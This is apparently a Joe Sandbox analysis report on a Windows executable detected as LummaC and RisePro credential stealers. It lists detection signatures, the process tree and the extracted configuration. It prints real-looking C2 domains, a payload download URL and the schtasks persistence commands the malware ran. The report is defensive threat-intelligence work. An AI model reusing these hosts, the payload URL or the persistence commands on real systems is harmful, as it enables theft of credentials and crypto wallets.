Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2q45IEa3Ee.exe

Overview

General Information

Sample name:2q45IEa3Ee.exe
renamed because original name is a hash value
Original sample name:4a36fa7c0ccbc6842c541a6439ab545a.exe
Analysis ID:1429253
MD5:4a36fa7c0ccbc6842c541a6439ab545a
SHA1:9257009dd59ac4db2518293bcd46be058d937284
SHA256:ca9b2380df90ac17d8c042db4ab442ffad68cc52cd2e557d855f7d571469198f
Tags:32exetrojan
Infos:

Detection

LummaC, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
Yara detected RisePro Stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 2q45IEa3Ee.exe (PID: 6736 cmdline: "C:\Users\user\Desktop\2q45IEa3Ee.exe" MD5: 4A36FA7C0CCBC6842C541A6439AB545A)
    • schtasks.exe (PID: 2140 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5500 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • oRkIPIEeryat7GMgjkBr.exe (PID: 7092 cmdline: "C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe" MD5: C60F5FA3A579BCA2C8C377F7E15B2221)
      • RegAsm.exe (PID: 1740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • MSIUpdaterV202.exe (PID: 8 cmdline: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe MD5: C60F5FA3A579BCA2C8C377F7E15B2221)
    • RegAsm.exe (PID: 5856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • MSIUpdaterV202.exe (PID: 6804 cmdline: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe MD5: C60F5FA3A579BCA2C8C377F7E15B2221)
    • RegAsm.exe (PID: 5900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • AdobeUpdaterV202.exe (PID: 2708 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe" MD5: C60F5FA3A579BCA2C8C377F7E15B2221)
    • RegAsm.exe (PID: 2128 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • AdobeUpdaterV202.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe" MD5: C60F5FA3A579BCA2C8C377F7E15B2221)
    • RegAsm.exe (PID: 5948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "bordersoarmanusjuw.shop"], "Build id": "H8NgCl--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\uw5Stgma3gbM9Xo4g_6cCoQ.zipJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1824382503.0000000005E26000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
              Process Memory Space: RegAsm.exe PID: 1740JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Process Memory Space: RegAsm.exe PID: 1740JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                  Click to see the 7 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2q45IEa3Ee.exe, ProcessId: 6736, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c

                  Snort Signatures

                  Timestamp:04/21/24-15:31:20.586831
                  SID:2052033
                  Source Port:52093
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:25.628405
                  SID:2052042
                  Source Port:49760
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:23.881087
                  SID:2052042
                  Source Port:49754
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:33.821783
                  SID:2052042
                  Source Port:49767
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:26.418186
                  SID:2052042
                  Source Port:49762
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:21.334851
                  SID:2052042
                  Source Port:49743
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:22.307200
                  SID:2052042
                  Source Port:49748
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:41.967279
                  SID:2052042
                  Source Port:49775
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:36.937476
                  SID:2052042
                  Source Port:49771
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:35.293170
                  SID:2052042
                  Source Port:49769
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:24.663338
                  SID:2052042
                  Source Port:49756
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:27.426056
                  SID:2052042
                  Source Port:49764
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:23.027299
                  SID:2052042
                  Source Port:49750
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:23.083597
                  SID:2052042
                  Source Port:49751
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:25.393562
                  SID:2052042
                  Source Port:49758
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:21.497185
                  SID:2052042
                  Source Port:49745
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:43.541138
                  SID:2052042
                  Source Port:49777
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:03.459237
                  SID:2046269
                  Source Port:49732
                  Destination Port:50500
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:23.803046
                  SID:2052042
                  Source Port:49753
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:22.231263
                  SID:2052042
                  Source Port:49747
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:26.161697
                  SID:2052042
                  Source Port:49761
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:45.038330
                  SID:2052042
                  Source Port:49779
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:45.673426
                  SID:2052042
                  Source Port:49780
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:33.057817
                  SID:2052042
                  Source Port:49766
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:24.609439
                  SID:2052042
                  Source Port:49755
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:41.199553
                  SID:2052042
                  Source Port:49774
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:34.487931
                  SID:2052042
                  Source Port:49768
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:37.580199
                  SID:2052042
                  Source Port:49772
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:20.726146
                  SID:2052042
                  Source Port:49742
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:24.761343
                  SID:2052042
                  Source Port:49757
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:21.449796
                  SID:2052042
                  Source Port:49744
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:26.584600
                  SID:2052042
                  Source Port:49763
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:36.076592
                  SID:2052042
                  Source Port:49770
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:42.756248
                  SID:2052042
                  Source Port:49776
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:00.128706
                  SID:2049060
                  Source Port:49732
                  Destination Port:50500
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:22.967985
                  SID:2052042
                  Source Port:49749
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:25.400720
                  SID:2052042
                  Source Port:49759
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:44.323393
                  SID:2052042
                  Source Port:49778
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:27.781654
                  SID:2052042
                  Source Port:49765
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:23.794727
                  SID:2052042
                  Source Port:49752
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:46.836355
                  SID:2052042
                  Source Port:49781
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:00.343729
                  SID:2046266
                  Source Port:50500
                  Destination Port:49732
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:11.754990
                  SID:2046267
                  Source Port:50500
                  Destination Port:49732
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:22.151633
                  SID:2052042
                  Source Port:49746
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/21/24-15:31:38.597070
                  SID:2052042
                  Source Port:49773
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for dropped file
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeAvira: detection malicious, Label: TR/AD.Nekark.sbdpe
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeAvira: detection malicious, Label: TR/AD.Nekark.sbdpe
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeAvira: detection malicious, Label: TR/AD.Nekark.sbdpe
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exeAvira: detection malicious, Label: TR/AD.Nekark.sbdpe
                  Found malware configuration
                  Source: 7.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "bordersoarmanusjuw.shop"], "Build id": "H8NgCl--"}
                  Multi AV Scanner detection for domain / URL
                  Source: https://bordersoarmanusjuw.shop:443/apiVirustotal: Detection: 16%Perma Link
                  Source: https://bordersoarmanusjuw.shop/Virustotal: Detection: 16%Perma Link
                  Source: https://bordersoarmanusjuw.shop/apiVirustotal: Detection: 16%Perma Link
                  Source: https://bordersoarmanusjuw.shop/api(Virustotal: Detection: 8%Perma Link
                  Source: https://bordersoarmanusjuw.shop/0Virustotal: Detection: 9%Perma Link
                  Source: https://bordersoarmanusjuw.shop/#Virustotal: Detection: 16%Perma Link
                  Source: mealplayerpreceodsju.shopVirustotal: Detection: 18%Perma Link
                  Source: economicscreateojsu.shopVirustotal: Detection: 13%Perma Link
                  Source: https://bordersoarmanusjuw.shop/api$Virustotal: Detection: 13%Perma Link
                  Source: http://193.233.132.253/lumma1504.exeVirustotal: Detection: 22%Perma Link
                  Source: https://bordersoarmanusjuw.shop/apieVirustotal: Detection: 15%Perma Link
                  Source: https://bordersoarmanusjuw.shop/apirVirustotal: Detection: 13%Perma Link
                  Source: entitlementappwo.shopVirustotal: Detection: 17%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeReversingLabs: Detection: 91%
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeVirustotal: Detection: 77%Perma Link
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeVirustotal: Detection: 77%Perma Link
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exeVirustotal: Detection: 77%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeVirustotal: Detection: 77%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: 2q45IEa3Ee.exeVirustotal: Detection: 23%Perma Link
                  Source: 2q45IEa3Ee.exeReversingLabs: Detection: 28%
                  Machine Learning detection for dropped file
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wifeplasterbakewis.shop
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: mealplayerpreceodsju.shop
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bordersoarmanusjuw.shop
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: suitcaseacanehalk.shop
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: absentconvicsjawun.shop
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pushjellysingeywus.shop
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: economicscreateojsu.shop
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: entitlementappwo.shop
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bordersoarmanusjuw.shop
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: H8NgCl--
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00415B57 CryptUnprotectData,7_2_00415B57
                  Source: 2q45IEa3Ee.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49745 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49753 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49756 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49757 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49762 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49765 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49766 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49767 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49768 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49770 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49771 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49772 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49773 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49774 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49776 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49777 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49778 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49780 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49781 version: TLS 1.2
                  Source: Binary string: C:\ka7c6p6\obj\Release\Question.pdbT2n2 `2_CorExeMainmscoree.dll source: MSIUpdaterV202.exe.0.dr, AdobeUpdaterV202.exe.0.dr, oRkIPIEeryat7GMgjkBr.exe.0.dr, lumma1504[1].exe.0.dr
                  Source: Binary string: D:\TestProject\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb source: 2q45IEa3Ee.exe
                  Source: Binary string: E:\HD_Audio\VS2005\Resetup\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdbP@n@ `@_CorExeMainmscoree.dll source: 2q45IEa3Ee.exe
                  Source: Binary string: E:\HD_Audio\VS2005\Resetup\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb source: 2q45IEa3Ee.exe
                  Source: Binary string: D:\TestProject\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb,ANA @A_CorExeMainmscoree.dll source: 2q45IEa3Ee.exe
                  Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 2q45IEa3Ee.exe, 2q45IEa3Ee.exe, 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmp
                  Source: Binary string: C:\ka7c6p6\obj\Release\Question.pdb source: MSIUpdaterV202.exe.0.dr, AdobeUpdaterV202.exe.0.dr, oRkIPIEeryat7GMgjkBr.exe.0.dr, lumma1504[1].exe.0.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: number of queries: 2357
